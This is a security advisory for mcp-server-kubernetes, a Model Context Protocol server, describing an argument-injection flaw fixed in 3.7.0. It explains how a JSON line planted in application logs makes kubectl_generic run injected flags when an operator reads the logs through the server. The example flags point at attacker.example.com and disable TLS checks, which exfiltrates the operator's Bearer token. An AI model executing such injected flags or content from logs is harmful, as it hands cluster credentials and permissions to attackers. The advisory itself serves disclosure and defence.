Impact
mcp-server-kubernetes, a Model Context Protocol server for Kubernetes cluster management, was found to pass user-supplied flags directly to kubectl without an allowlist. Prior to version 3.7.0, this flaw allowed an attacker with limited cluster access, such as a developer with pod‑deployment permissions, to inject a single structured JSON line into application logs. When a privileged operator reads those logs with the MCP server, kubectl_generic executes the injected flags (e.g., --server=https://attacker.example.com and --insecure‑skip‑tls‑verify=true), sending all API requests—including the Bearer token from the operator's kubeconfig—to the attacker’s endpoint. The captured token can then be replayed against the real Kubernetes API, granting the attacker the full RBAC permissions of the operator’s service account. This flaw is an example of CWE-88. The issue is fixed in release 3.7.0.
Affected Systems
Flux159’s mcp-server-kubernetes version 3.6.x and earlier are affected. The issue was fixed in release 3.7.0. The vulnerability impacts Kubernetes cluster environments where the MCP server is used for cluster management and operators have the ability to read logs produced by applications.
Risk and Exploitability
The CVSS score of 6.1 indicates a moderate severity. The EPSS score is not available and the vulnerability is not listed in the CISA KEV catalog. Exploitation requires an attacker to already possess limited cluster or codebase access—such as a developer with pod‑deployment permissions—and the ability to inject a JSON line into application logs. The attacker must also rely on a privileged operator reading those logs, which is an additional prerequisite. Given the requirement for preexisting access and the lack of a publicly known exploit, the risk is moderate but still significant for environments with permissive log access or insufficient controls on who can read logs and empower the MCP server.
OpenCVE Enrichment
Github GHSA